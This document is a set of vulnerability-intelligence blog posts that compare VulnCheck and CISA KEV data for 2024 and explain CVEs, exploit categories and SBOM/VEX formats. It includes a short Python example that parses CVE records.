2024",[59879],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":59881,"toc":60074},[59882,59884,59901,59904,59912,59915,59923,59927,59932,59935,59938,59941,59945,59948,59952,59957,59960,59963,59966,59970,59975,59978,59981,59984,59988,59997,60002,60005,60008,60012,60017,60020,60023,60026,60029,60033,60036,60039,60063,60065,60067,60069],[61,59883,20],{"id":3520},[22,59885,59886,59889,59892,59895,59898],{},[25,59887,59888],{},"VulnCheck now provides an automated approach to providing broader visibility into differences between VulnCheck KEV and CISA KEV through a Jupyter Notebook publicly available on GitHub.",[25,59890,59891],{},"During 2024 (year-to-date), VulnCheck KEV added 717 new known exploited vulnerabilities (average of 59.8\u002Fmonth) vs. 170 added to CISA KEV (average of 14.2\u002Fmonth).",[25,59893,59894],{},"During 2024 (year-to-date), VulnCheck KEV added 410 unique vendors with one or more KEV vs. 56 unique vendors in CISA KEV.",[25,59896,59897],{},"The top 10 vendors by number of exploited vulnerabilities in 2024 include Microsoft (55), Apache (18), Ivanti (17), Apple (16), D-Link (14), Oracle (14), Google (13), Cisco (11), Progress (11) and VMware (11).",[25,59899,59900],{},"The top 10 products with exploited vulnerabilities in 2024 include Microsoft Windows (30), Google Chrome \u002F Chromium (11), Apple IOS products (9), Apache OFBiz (6), Ivanti Connect Secure (6), Citrix Netscaler (6), Apple Safari (5), Cisco ASA \u002F FTD (5), QNAP QTS (5), and openSSL (5).",[18,59902,59903],{},"Video Walkthrough: VulnCheck KEV Jupyter Notebook",[59905,59906],"iframe",{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":59910,"title":59911,"width":10862},"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",400,"strict-origin-when-cross-origin","https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FrFBUMqFQ4as?si=bEtJfBuVWaRiosss","YouTube video 
player",[18,59913,59914],{},"Last month, we forewent our monthly update on known exploited vulnerabilities (KEVs) and put that work towards building an automated approach to reviewing KEV trends that is easy for anyone to copy, modify and use. Our goal is to provide broader visibility into differences between VulnCheck KEV and CISA KEV using a public Jupyter Notebook that is automatically updated on a daily basis.",[18,59916,59917,59918,59922],{},"The Jupyter Notebook is available on VulnCheck’s Github ",[47,59919,3054],{"href":59920,"rel":59921},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fjupyter-notebooks\u002Fblob\u002Fmain\u002Fvulncheck-kev\u002Fvulncheck-kev-dashboard.ipynb",[51]," to use and works with our free community edition if you want to build your own VulnCheck KEV dashboard.",[61,59924,59926],{"id":59925},"_2024-known-exploited-vulnerabilities-statistics-cisa-kev-vs-vulncheck-kev","2024 Known Exploited Vulnerabilities Statistics (CISA KEV vs. VulnCheck KEV)",[18,59928,59929],{},[68,59930],{":width":10862,"alt":58618,"src":59931},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fkev-stats-2024.png",[18,59933,59934],{},"The first area we explored was the volume differences between VulnCheck KEV and CISA KEV. To visualize this, we created a top-level dashboard highlighting key statistics for 2024, including:\nThe total number of KEVs added. VulnCheck KEV added 717 new known exploited vulnerabilities, while CISA KEV added 170.",[18,59936,59937],{},"The average number of KEVs added per month. VulnCheck averaged 59.8 KEVs per month, while CISA averaged 14.2 per month. The number of unique vendors with at least one KEV. There are 410 unique vendors that had 1 or more KEV added to VulnCheck, while CISA covered 56 vendors. The number of unique products represented. 
VulnCheck added KEVs with 1 or more KEV while CISA added 98.",[18,59939,59940],{},"This dashboard provides a clear comparison of vendor and product coverage between VulnCheck KEV and CISA KEV.",[61,59942,59944],{"id":59943},"exploring-cisa-kev-vulncheck-kev-by-vendor-product","Exploring CISA KEV & VulnCheck KEV by Vendor & Product",[18,59946,59947],{},"Given the significant disparity in the number of vendors and products between CISA KEV and VulnCheck KEV, we created an interactive explorer to help visualize and explore the data. To achieve this, we used an interactive treemap within a Jupyter notebook. To interact with these treemaps, simply download the Jupyter notebook and open it in a tool like VS Code.",[993,59949,59951],{"id":59950},"exploring-vulncheck-kev-vendors-products","Exploring VulnCheck KEV Vendors \u002F Products",[18,59953,59954],{},[68,59955],{":width":10862,"alt":58618,"src":59956},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fvulncheck-kev-2024.png",[18,59958,59959],{},"Based on exploit intelligence first captured by VulnCheck in 2024, the top 10 vendors by number of exploited vulnerabilities include Microsoft (55), Apache (18), Ivanti (17), Apple (16), D-Link (14), Oracle (14), Google (13), Cisco (11), Progress (11) and VMware (11).",[18,59961,59962],{},"Based on exploit intelligence first captured by VulnCheck in 2024, the top 10 products by exploited vulnerabilities include Microsoft Windows (30), Google Chrome \u002F Chromium (11), Apple IOS products (9), Apache OFBiz (6), Ivanti Connect Secure (6), Citrix Netscaler (6), Apple Safari (5), Cisco ASA \u002F FTD (5), QNAP QTS (5), and openSSL (5).",[18,59964,59965],{},"This data highlights the persistent targeting by threat actors across various platforms, including operating systems, browsers, web services, and network edge devices. 
Notably, products such as Hiltron DVR, Netlify OpenMetadata, and Paytium were omitted from this list due to the issuance of multiple CVEs for similar vulnerabilities simultaneously or their relatively lower prevalence.",[993,59967,59969],{"id":59968},"exploring-cisa-kev-by-vendors-products","Exploring CISA KEV by Vendors \u002F Products",[18,59971,59972],{},[68,59973],{":width":10862,"alt":58618,"src":59974},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fcisa-kev-2024.png",[18,59976,59977],{},"The top 10 vendors by number of vulnerabilities that CISA added to KEV in 2024 include Microsoft (34), Ivanti (11), Adobe (7), Apple (7), Android (6), Cisco (6), D-Link (6), Palo Alto Networks (6), Apache (5), and VMware (5).",[18,59979,59980],{},"The top 10 products added to CISA KEV include Microsoft Windows (22), Google Chrome\u002FChromium (9), Cisco ASA \u002F FTD (5), Apple IOS Products (5), Adobe Flash Player (4), Android Pixel (4), VMware Vcenter (4), and Linux Kernel (4).",[18,59982,59983],{},"Additionally, there’s a notable distinction in the vulnerabilities added to the CISA KEV list. Many, such as those in Adobe Flash, had exploitation evidence publicly available years prior. This underscores differences between newly exploited vulnerabilities and the re-emergence of previously known vulnerabilities, a topic I’ll explore later in this post.",[61,59985,59987],{"id":59986},"comparing-2024-kevs-added-to-cisa-kev-and-vulncheck-kev-by-day-month-and-year","Comparing 2024 KEVS added to CISA KEV and VulnCheck KEV by day, month and year",[18,59989,59990,59991,59996],{},"To understand the frequency at which Known Exploited Vulnerabilities (KEVs) were added throughout the year, we created a calendar chart inspired by Jerry Gamblin’s ",[47,59992,59995],{"href":59993,"rel":59994},"https:\u002F\u002Fcve.icu\u002FCVECalendar.html",[51],"cve.icu"," project. 
These visualizations highlight the patterns of KEV additions across CISA KEV and VulnCheck KEV.",[18,59998,59999],{},[68,60000],{":width":10862,"alt":58618,"src":60001},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fkev-calendar.png",[18,60003,60004],{},"Looking at VulnCheck KEV, we see a consistent amount of exploitation activity seen for the first time throughout the year, with some larger numbers highlighted in yellow. These tend to be quarterly industry reports disclosing a larger number of vulnerabilities with observed exploitation. The highest number of vulnerabilities with exploitation evidence being added to VulnCheck KEV in a single day was 55. It’s also interesting to see a lull during US holiday seasons like Thanksgiving. We're not sure if it's security researchers or threat actors that take a break. LOL",[18,60006,60007],{},"When we look at CISA KEV, the number of vulnerabilities added is much sparser and tends to group during weekdays, specifically Monday - Thursday, with only 4 instances of a KEV being reported on Fridays. CISA has not issued a single KEV during the weekend this year.",[61,60009,60011],{"id":60010},"historical-exploitation-evidence-availability-before-cisa-kev-all-cisa-kevs","Historical Exploitation Evidence Availability Before CISA KEV (All CISA KEVs)",[18,60013,60014],{},[68,60015],{":width":10862,"alt":58618,"src":60016},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fcisa-kev-exploitation-availability.png",[18,60018,60019],{},"Next, we analyzed the time gap between vulnerabilities being added to CISA KEV and the availability of publicly documented exploitation evidence in VulnCheck KEV. 
We did this by reviewing all historical CISA KEVs and mapping the dates of publicly available exploitation evidence.",[18,60021,60022],{},"Time Gap Insights: In 53.4% of cases, exploitation evidence is publicly available more than one month prior to the vulnerability being added to CISA KEV.",[18,60024,60025],{},"Same-Day Evidence: When exploitation evidence and CISA KEV updates coincide on the same day, it typically occurs during Patch Tuesday, when exploitation evidence is widely documented and known to be coming from reliable sources.",[18,60027,60028],{},"On occasion we see unique evidence published from CISA that wasn't available elsewhere, which is a smaller subset of the 327 vulnerabilities in the same-day evidence bucket.",[61,60030,60032],{"id":60031},"explore-vulncheck-kev-and-cisa-kev-yourself","Explore VulnCheck KEV and CISA KEV Yourself",[18,60034,60035],{},"The Jupyter Notebook used to generate this research is a free resource that uses VulnCheck’s Python SDK and community edition, making it available to all.",[18,60037,60038],{},"Get started today",[1789,60040,60041,60047,60053,60060],{},[25,60042,60043],{},[47,60044,60046],{"href":40745,"rel":60045},[51],"Signup for VulnCheck Community",[25,60048,60049],{},[47,60050,60052],{"href":59920,"rel":60051},[51],"Download the Jupyter Notebook",[25,60054,60055],{},[47,60056,60059],{"href":60057,"rel":60058},"https:\u002F\u002Fdocs.vulncheck.com\u002Fgetting-started\u002Fapi-tokens",[51],"Enter your API key from VulnCheck",[25,60061,60062],{},"Make modifications and explore VulnCheck KEV and CISA 
_Published 2024-12-05 | /blog/comparing-kevs-jupyter_

# Common Vulnerabilities and Exposures

Identifying and managing vulnerabilities effectively is one of the most crucial steps in reducing risk and maintaining effective protection from emerging threats. The Common Vulnerabilities and Exposures (CVE) program plays an essential role in this effort by providing a standardized identification system for vulnerabilities, enabling organizations worldwide to track and address threats consistently.

The CVE system was established in 1999 by the MITRE Corporation, with the goal of creating a universal, standardized identifier for software vulnerabilities. For organizations, CVEs facilitate consistent tracking, reporting, and communication around vulnerabilities across different teams and security products. The CVE system ensures that the industry speaks a common language when discussing vulnerabilities, from security advisories to patching efforts.

**The CVE Lifecycle**
The lifecycle of a CVE entry spans several stages, from initial identification to eventual publication. Here’s a breakdown of each stage:

- **Discover and Report:** Vulnerabilities are identified by a wide range of sources, including independent security researchers, vendors, and security-conscious individuals. Once a vulnerability is identified, a report is submitted to a CVE Numbering Authority (CNA) for assessment and processing.
- **Assignment and Validation:** CVE Numbering Authorities, or CNAs, are organizations authorized to assign CVE IDs to vulnerabilities within a specific scope, typically the organization’s own products. Once a vulnerability report is received, the CNA vets the report and, if warranted, reserves a CVE ID for the new vulnerability. The vulnerability is then fully reviewed and validated, ensuring its scope is properly understood. If the vulnerability is deemed not to have merit, the CVE ID is marked as rejected. When the CNA is also the vendor, it typically begins developing a patch at this stage, which can take some time depending on the nature of the vulnerability and the risk of in-the-wild exploitation.
- **Submission and Publication:** Once the above steps are complete, the CNA submits the record to the CVE Program (operated by MITRE) and it is published to the public CVE list. At this point the vulnerability is visible to security vendors and organizations around the world.
- **Enrichment:** Published CVEs are imported into NIST’s National Vulnerability Database (NVD), where they are further enriched. NVD enrichment adds context including official designations (CPE names) for the platforms the vulnerability affects, a weakness category (CWE), and standardized severity scores (CVSS). The time for this enrichment can vary significantly, depending on the availability of reference material as well as the NVD backlog at the time of publication.
- **Exploitation:** If evidence of active exploitation surfaces for a published CVE, it’s important to communicate this to the security community to assist with prioritization of remediation efforts. CISA maintains the Known Exploited Vulnerabilities (KEV) catalog to serve this purpose. CISA relies on reports from a variety of community sources, as well as its own internal monitoring and open-source research. Once CISA is aware of new exploitation, the KEV is typically updated within 24 hours, but it’s not uncommon for an exploit to be in use in the wild for days or weeks before a CISA notification.
- **Updates:** CVE records may be updated over time as additional details become available, such as updated severity ratings or additional references. Updates are submitted through a similar process to the original CVE and are validated by the relevant CNA.

**What information is included in a CVE?**
Once a CVE record is published and enriched via the NVD, it typically includes the following key pieces of information:

- **CVE ID:** A unique identifier for the vulnerability in the form "CVE-YYYY-NNNN", where "YYYY" is the year the CVE ID was reserved and "NNNN" is a sequence number of at least four digits (five or more digits are routine as a year’s allocations grow).
- **Description:** A concise summary of the vulnerability, including affected products and general information about the nature of the issue. The description provides enough information to identify the issue without delving into technical detail or exploit specifics.
- **References:** Links to additional resources, advisories, or vendor statements that provide further details about the vulnerability.
- **Affected Products and Versions:** A list of specific products, software versions, or platforms impacted by the vulnerability. After NVD enrichment this information is also available in Common Platform Enumeration (CPE) format, which provides an unambiguous, structured naming scheme for the affected products.
- **Weakness Enumeration:** Weakness enumeration helps organizations understand the general class or nature of the vulnerability. The Common Weakness Enumeration (CWE) is used to categorize the type of vulnerability (e.g., CWE-79 for cross-site scripting or CWE-89 for SQL injection).
- **Severity and Scoring:** CVE records usually carry a CVSS (Common Vulnerability Scoring System) rating, supplied by the CNA in the record itself or added by the NVD during enrichment. The CVSS score gives a numerical rating for the severity of the vulnerability, helping teams prioritize based on factors like impact and exploitability.
- **Known Exploitation:** If there are known in-the-wild exploits of a vulnerability, the vulnerability is listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, and the NVD entry is flagged accordingly.

**Challenges in Using CVEs**
Despite the essential role CVEs play, relying solely on CVE information can introduce several challenges in vulnerability management:

- **Incompleteness and Delays:** While the CVE list is extensive, it is not exhaustive. Many vulnerabilities go unlisted, often due to resource limitations or prioritization of high-impact vulnerabilities by CNAs. Additionally, delays in CVE assignment, especially for zero-day vulnerabilities, can leave organizations with a dangerous gap in their threat intelligence. These delays are exacerbated by the multiple parties involved in documenting a CVE, including the CNA, MITRE, NVD, and CISA.
- **Data Quality and Consistency Issues:** CVE entries vary widely in the level of detail provided, with some entries offering minimal information. This inconsistency can create confusion when teams try to assess the risk posed by a vulnerability, as they may lack the context needed to understand its true impact.
- **Contextual Limitations:** CVEs focus on providing identifiers and basic vulnerability details, but lack the exploitability information that many organizations need to prioritize effectively. Knowing that a vulnerability exists is not always enough; teams need contextual details like exploit availability, threat actor activity, and environmental relevance to determine whether immediate action is warranted.
- **Volume and Prioritization:** With tens of thousands of CVEs published each year, the sheer volume can be overwhelming. Without additional context, security teams can struggle to identify which vulnerabilities are most critical to their environment, leading to a “patch everything” mindset that is neither efficient nor sustainable.

Understanding and utilizing the CVE system is essential for effective vulnerability management, but CVEs alone often do not provide the full picture. The challenges posed by CVE data (delays, lack of contextual detail, and overwhelming volume) highlight the need for supplemental intelligence that provides a deeper, more accurate perspective on vulnerabilities.

Solutions like VulnCheck enhance vulnerability data with critical exploit and threat intelligence in near real time, empowering organizations to prioritize vulnerabilities based on real-world risk.
By augmenting CVE data with VulnCheck Exploit Intelligence, security teams can act faster and maintain a proactive approach in a rapidly evolving threat landscape.

_Published 2024-12-04 | Exploit Intel 101 - Common Vulnerabilities and Exposures (CVE) | /blog/common-vulnerabilities-and-exposures_

# Understanding Exploits

An exploit is a technique, code, or a set of commands that an attacker uses to take advantage of a vulnerability in a system, application, or network. Exploits are one of the most prevalent techniques attackers use to gain unauthorized access, exfiltrate data, disrupt operations, or escalate privileges within a target environment. According to [Verizon’s 2024 Data Breach Investigations Report](https://www.verizon.com/business/en-gb/resources/reports/2024/dbir/2024-dbir-data-breach-investigations-report.pdf), exploitation of vulnerabilities as the initial point of entry in breaches grew by roughly 180% over the previous year’s report.

Exploits vary in form and impact; some are simple commands that reveal minor data leaks, while others might involve complex, custom-tailored software that fully compromises a system. Understanding exploits and their potential impact is essential for defending against modern cyberattacks and prioritizing responses.

The overall impact and accessibility of exploits can vary greatly depending on the nature of the underlying vulnerability being exploited. Let’s review the most common exploit categories and the impact of some real-world examples.

### 1. Initial Access Exploits

Initial Access exploits allow attackers to gain unauthorized remote access to a system without needing credentials. Often referred to as Remote Code Execution (RCE) exploits, these enable attackers to execute arbitrary code on a target system, leading to full system compromise. Because they provide an initial foothold, Initial Access exploits are among the most critical types for organizations to defend against, as they open the door for attackers to deploy malware, establish backdoors, and move laterally across a network. The risk is heightened by the fact that these exploits often allow attackers to operate without any user interaction, making detection and defense particularly challenging.

- **Example: Microsoft Exchange ProxyLogon (CVE-2021-26855):** Disclosed in March 2021, this vulnerability became a major entry point for the Chinese state-affiliated advanced persistent threat (APT) group Hafnium and other APT actors. ProxyLogon allowed remote attackers to gain full control over Microsoft Exchange servers without authentication, and it was commonly used to implant web shells for persistent access. The attacks targeted multiple sectors around the globe, including government, healthcare, education, and the private sector. Within weeks of the vulnerability’s disclosure, reports estimated that tens of thousands of organizations had been compromised, incurring substantial costs for detection, containment, and remediation.

### 2. Remote with Credentials Exploits

Remote with Credentials exploits are a category of exploit where unauthorized remote access to a target system is possible, but requires valid user credentials. Attackers who acquire login credentials through techniques like phishing or credential stuffing can leverage these exploits to access network-bound applications or systems. These exploits can allow an adversary to achieve extensive control over a system or application, but the requirement for credentials complicates the exploitation process, somewhat mitigating the associated risk.

- **Example: Cisco IOS XE Web UI vulnerability (CVE-2023-20273):** This vulnerability in the web management interface of Cisco IOS XE allows a remote, authenticated attacker to execute commands with root privileges on affected devices. In October 2023 Cisco reported that threat actors, active since the previous month, had exploited it to escalate privileges and deploy the "BadCandy" implant, a backdoor web shell that gave attackers deep and persistent access to compromised networks even after the vulnerability was patched.

### 3. Local Exploits

Local exploits require attackers to have direct access to the target system and typically involve privilege escalation vulnerabilities. These exploits are often used to elevate privileges once an attacker has already gained a foothold in the system, enabling them to access restricted areas or sensitive data. Local exploits play a critical role in multi-stage attacks, where attackers first gain limited access, perhaps through phishing or other social engineering, and then use local exploits to deepen their control. Although they require some level of access to begin with, local exploits can significantly escalate an attack’s damage potential by broadening attacker privileges.

- **Example: Linux Kernel Dirty Pipe vulnerability (CVE-2022-0847):** This vulnerability allowed attackers with basic user privileges on a Linux system to escalate their access, effectively enabling them to write to read-only files and gain root-level privileges. The Dirty Pipe vulnerability quickly drew attention as it affected a wide range of Linux distributions and devices, including those widely used in enterprise environments. Threat actors targeted cloud environments and shared systems where local privilege escalation could provide critical advantages, allowing them to access sensitive data or disrupt services.

### 4. Client-Side Exploits

Client-side exploits target end-user applications, such as web browsers, email clients, or common office productivity software. These exploits are often triggered when a user interacts with malicious content, such as by opening a document or clicking a link. Client-side exploits are particularly effective in targeted attacks, where attackers can deliver malicious payloads to users of vulnerable applications. The damage from these exploits can vary based on the application’s security settings and the level of user privileges. They often serve as an initial foothold, enabling attackers to breach enterprise environments or gain access to sensitive data.

- **Example: Follina (CVE-2022-30190):** This vulnerability in Microsoft’s Support Diagnostic Tool (MSDT) allowed attackers to execute arbitrary code by tricking users into opening specially crafted Microsoft Word documents. Exploited by various threat actors, including APT groups, Follina was employed in phishing campaigns aimed at sectors such as government, finance, and healthcare, where it was used to deliver malware and establish footholds in networks with high-value targets.

### 5. Infoleak Exploits

Information leak (Infoleak) exploits allow attackers to access sensitive data without authorization. These exploits are typically used to extract information such as encryption keys, memory contents, or login credentials, which attackers can then use to support further exploitation or surveillance. Infoleak exploits are particularly dangerous in shared or multi-tenant environments, where exposed data can compromise multiple users or organizations.

- **Example: Spectre-BHB (CVE-2022-23960):** This vulnerability affected several modern CPU architectures, allowing attackers to bypass memory isolation protections and access sensitive information stored in protected memory areas. Spectre-BHB posed a severe risk in cloud and virtualized environments, where it could enable attackers to access data across virtual machines in shared infrastructure.

### 6. Denial of Service (DoS) Exploits

Denial of Service (DoS) exploits aim to disrupt a target service or application, often by overwhelming resources or forcing system crashes. These exploits don’t provide unauthorized access, but they can cause significant operational disruptions. The impact of DoS exploits is often measured in terms of downtime, loss of revenue, and reputational damage, making them especially concerning in industries that rely heavily on continuous service availability.

- **Example: SACK Panic (CVE-2019-11477):** This vulnerability in the Linux kernel’s TCP stack affects the handling of TCP Selective Acknowledgement (SACK) packets. Specifically, it allows attackers to send crafted SACK packets with a low Maximum Segment Size (MSS), which can trigger a kernel panic and crash the system. Shortly after disclosure, scans and exploitation attempts targeting this vulnerability were observed, particularly against Linux servers in cloud and hosting environments.

The distinctions among exploit types are critical for prioritizing vulnerability remediation.
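One way to make both the record fields and the exploit categories concrete, as an added example (not VulnCheck's code, nor the CVE Program's): a Python parser that pulls the fields listed under "What information is included in a CVE?" in the CVE article out of a CVE JSON 5.1 record, then derives one of this article's six exploit categories from the CVSS v3 base metrics. The sample record is constructed: CVE-2024-0000 is a placeholder identifier, and the vendor, product, vector and URL are made up. The metric-to-category mapping is this example's own heuristic (impact-only vectors first, then attack vector, user interaction and privileges), not a published taxonomy.

```python
"""Parse a CVE JSON 5.1 record and derive an exploit category from its CVSS vector.

Added example, not VulnCheck's or the CVE Program's code. SAMPLE_RECORD is
CONSTRUCTED: it follows the CVE JSON 5.1 container layout, but CVE-2024-0000
is a placeholder identifier and the vendor, product, vector and URL are made up.
"""
import json
import re

# "CVE-YYYY-NNNN...": four-digit year, then a sequence number of four or more digits.
CVE_ID_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")

# Constructed sample record (placeholder data) in CVE JSON 5.1 layout.
SAMPLE_RECORD = {
    "dataType": "CVE_RECORD", "dataVersion": "5.1",
    "cveMetadata": {"cveId": "CVE-2024-0000", "state": "PUBLISHED"},
    "containers": {"cna": {
        "descriptions": [{"lang": "en", "value": "ExampleCo Widget before 1.4.2 allows "
                          "unauthenticated OS command injection via the management API."}],
        "affected": [{"vendor": "ExampleCo", "product": "Widget",
                      "versions": [{"version": "1.0", "lessThan": "1.4.2",
                                    "status": "affected", "versionType": "semver"}]}],
        "problemTypes": [{"descriptions": [{"type": "CWE", "cweId": "CWE-78", "lang": "en",
                                            "description": "OS Command Injection"}]}],
        "metrics": [{"cvssV3_1": {"version": "3.1", "baseScore": 9.8, "baseSeverity": "CRITICAL",
                                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}],
        "references": [{"url": "https://example.invalid/advisory"}],  # placeholder URL
    }},
}


def parse_cvss_vector(vector):
    """'CVSS:3.1/AV:N/AC:L/...' -> {'AV': 'N', 'AC': 'L', ...}; only v3.x handled."""
    prefix, *metrics = vector.split("/")
    if prefix not in ("CVSS:3.0", "CVSS:3.1"):
        raise ValueError(f"unsupported CVSS vector: {vector}")
    return dict(m.split(":", 1) for m in metrics)


def exploit_category(m):
    """Heuristic mapping of CVSS v3 base metrics onto the six exploit categories.
    Impact-only shapes (DoS, infoleak) are checked first so they keep their
    category whatever the attack vector; then local, client-side (needs user
    interaction), unauthenticated remote (initial access), authenticated remote."""
    if m["C"] == "N" and m["I"] == "N" and m["A"] != "N":
        return "denial_of_service"
    if m["I"] == "N" and m["A"] == "N" and m["C"] != "N":
        return "infoleak"
    if m["AV"] in ("L", "P"):
        return "local"
    if m["UI"] == "R":
        return "client_side"
    if m["PR"] == "N":
        return "initial_access"
    return "remote_with_credentials"


def describe_versions(entry):
    """Render one `affected` entry as 'vendor product range' strings."""
    lines = []
    for v in entry.get("versions", []):
        if v.get("status") != "affected":
            continue
        rng = v["version"]
        if "lessThan" in v:
            rng += f" to <{v['lessThan']}"
        elif "lessThanOrEqual" in v:
            rng += f" to <={v['lessThanOrEqual']}"
        lines.append(f"{entry.get('vendor', '?')} {entry.get('product', '?')} {rng}")
    return lines


def parse_record(record):
    """Extract ID, description, references, affected products, CWE and CVSS from
    a CVE JSON 5.1 record given as a JSON string or an already-parsed dict."""
    rec = json.loads(record) if isinstance(record, str) else record
    cve_id = rec["cveMetadata"]["cveId"]
    if not CVE_ID_RE.match(cve_id):
        raise ValueError(f"malformed CVE ID: {cve_id}")
    cna = rec["containers"]["cna"]
    parsed = {
        "id": cve_id,
        "state": rec["cveMetadata"].get("state"),
        "description": next((d["value"] for d in cna.get("descriptions", [])
                             if d.get("lang", "").startswith("en")), ""),
        "references": [r["url"] for r in cna.get("references", [])],
        "affected": [line for e in cna.get("affected", []) for line in describe_versions(e)],
        "cwes": [d["cweId"] for pt in cna.get("problemTypes", [])
                 for d in pt.get("descriptions", []) if "cweId" in d],
        "cvss_score": None, "cvss_severity": None, "exploit_category": "unknown",
    }
    cvss = next((m[k] for m in cna.get("metrics", [])
                 for k in ("cvssV3_1", "cvssV3_0") if k in m), None)
    if cvss:  # absent until the CNA (or NVD enrichment) supplies a score
        parsed["cvss_score"] = cvss["baseScore"]
        parsed["cvss_severity"] = cvss["baseSeverity"]
        parsed["exploit_category"] = exploit_category(parse_cvss_vector(cvss["vectorString"]))
    return parsed


if __name__ == "__main__":
    print(json.dumps(parse_record(SAMPLE_RECORD), indent=2))
```

A record with no CVSS metrics (still RESERVED, or published but not yet enriched) comes back with `exploit_category` set to `unknown` rather than guessed; that is the "Incompleteness and Delays" case from the CVE article, and a pipeline should queue such records for re-check rather than drop them.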
From Initial Access exploits that provide attackers with system entry points to Infoleak and Denial-of-Service exploits that create operational challenges, each type requires tailored mitigation strategies. Understanding these nuances empowers cybersecurity teams to better allocate resources, strengthen defenses, and reduce risks in an increasingly complex threat landscape.

_Published 2024-12-04 | Exploit Intel 101 - Understanding Exploits | /blog/understanding-exploits_

# Vulnerability Exchange Formats - CycloneDX, SPDX, VDR, and VEX

Modern software is made up of a massive, interconnected web of components, with applications relying heavily on open-source libraries, third-party dependencies, and complex supply chains. This complexity creates challenges for organizations looking to track the software that’s deployed across their networks, as well as to prioritize and remediate the vulnerabilities embedded within it.

Understanding, prioritizing, and remediating modern vulnerabilities is far too complicated to accomplish via spreadsheets or other disconnected, manual workflows. Most organizations of any size benefit greatly from integrating and automating as much of the process as possible. In this article we’ll explore a number of standard machine-readable data formats for vulnerability data, how they are used, and how they interact to automate and improve security across the software supply chain.

## Software Bill of Materials (SBOM)

A Software Bill of Materials, or SBOM, serves as the foundation for understanding the components within a piece of software. SBOMs provide the "ingredient list" of an application by enumerating all libraries, dependencies, and modules, giving organizations critical visibility into their software supply chain. This transparency enables them to identify risks, track vulnerabilities, and ensure compliance with licensing requirements. SBOMs are designed to work with automated tools, thanks to their machine-readable formats. Two leading SBOM standards, CycloneDX and SPDX, are widely used.

## CycloneDX: A Security-Focused SBOM Format

CycloneDX was developed by OWASP, a global non-profit organization dedicated to improving the security of web applications and other software. This SBOM standard was specifically designed with security in mind, making it a powerful tool for tracking vulnerabilities and dependencies. CycloneDX supports machine-readable serializations such as JSON and XML, which enable easy integration into automated security workflows.

One of CycloneDX’s key strengths is its detailed support for dependency relationships. It not only lists software components, but also maps how they depend on each other, making it easier to assess the ripple effects of a vulnerability. For example, if a deeply nested dependency in your software stack is affected by a critical vulnerability, CycloneDX’s structure ensures this risk is surfaced clearly.

Additionally, CycloneDX has been widely adopted in DevSecOps pipelines, where it helps organizations improve security at the earliest stages of the software development lifecycle. By generating SBOMs during the development process, teams can identify vulnerable modules before software is deployed.

## Software Package Data Exchange (SPDX): A Flexible and Open SBOM Standard

The Linux Foundation maintains SPDX (Software Package Data Exchange), an international open standard (ISO/IEC 5962) originally created to manage software license compliance. Over time, it has evolved into a comprehensive SBOM standard used for both licensing and security purposes. One of SPDX’s greatest strengths is its flexibility: it supports multiple serializations, including JSON, YAML, RDF, and tag/value, making it highly adaptable to a variety of environments.

SPDX has been embraced by open-source projects and enterprises alike. It is especially valuable for organizations managing large software ecosystems with diverse licensing requirements. Its compatibility with automated tools ensures that security and compliance checks can scale with the complexity of modern applications.

## Vulnerability Disclosure Reports (VDR)

When a new vulnerability is confirmed in a piece of software or hardware, it’s important to communicate it quickly and clearly to the broader community so defenders can take action. A Vulnerability Disclosure Report (VDR) formalizes this process, offering essential details such as the nature of the vulnerability, the affected systems or software versions, and remediation steps.

VDRs are typically published by vendors or service providers alongside the relevant SBOM for their product and its dependencies, and are updated over time as new vulnerabilities emerge. A VDR for a piece of software captures the known vulnerabilities that affect it, along with descriptions and suggested plans for addressing them, in a machine-readable format; in CycloneDX, for instance, a VDR is the `vulnerabilities` array of a BOM, each entry pointing at the affected components by their bom-ref. Incorporating VDRs into vulnerability management processes allows security teams to quickly understand and manage their baseline exposure.

## Vulnerability Exploitability Exchange (VEX)

Not all vulnerabilities are equally dangerous, and not all require immediate action. The Vulnerability Exploitability Exchange (VEX) standard addresses this by answering a critical question: is a given vulnerability exploitable in a specific product or environment? While an SBOM and VDR can help to identify vulnerabilities present within a system, a VEX report provides the context needed to prioritize remediation efforts.

VEX reports are structured to map vulnerabilities to specific configurations or deployment scenarios. Each statement carries a status (the CISA minimum set is not affected, affected, fixed, and under investigation; CycloneDX expresses the same ideas as analysis states such as `not_affected`, `exploitable`, `resolved`, and `in_triage`), and a "not affected" statement should carry a justification, such as the vulnerable code not being present or not being reachable. For instance, a vulnerability might exist in a library but be rendered non-exploitable because the affected feature is not used in the application, or due to environmental conditions. By providing this clarity, VEX reports help organizations focus their resources on the risks that matter most.

**Bringing It All Together**
SBOMs, VDRs, and VEX reports address different but interconnected stages of the vulnerability management lifecycle, forming a cohesive framework for identifying, analyzing, and prioritizing software vulnerabilities. Together, they provide a robust system for understanding risks and responding effectively.

Consider a scenario like the Log4j vulnerability (CVE-2021-44228). When the vulnerability was disclosed, security teams relied on VDRs for detailed information about its impact and the affected versions of software they had deployed in their organizations. With an SBOM in hand, organizations could autonomously identify whether their applications included a vulnerable library, either directly or as a nested dependency.

For those affected, correlating with VEX reports provided crucial insight into whether the vulnerability was exploitable, immediately highlighting the applications that were at most risk and in most need of remediation. Together, these standards enable a streamlined, automated approach to managing vulnerabilities, reducing the time between discovery and resolution.

**Standards Help Build Resilience Through Automation**
In an era where vulnerability exploits are rapidly on the rise, SBOMs, VDRs, and VEX reports are indispensable tools for streamlining vulnerability management. Their machine-readable nature enables automation, driving scalable and effective vulnerability management even in large and complex environments.
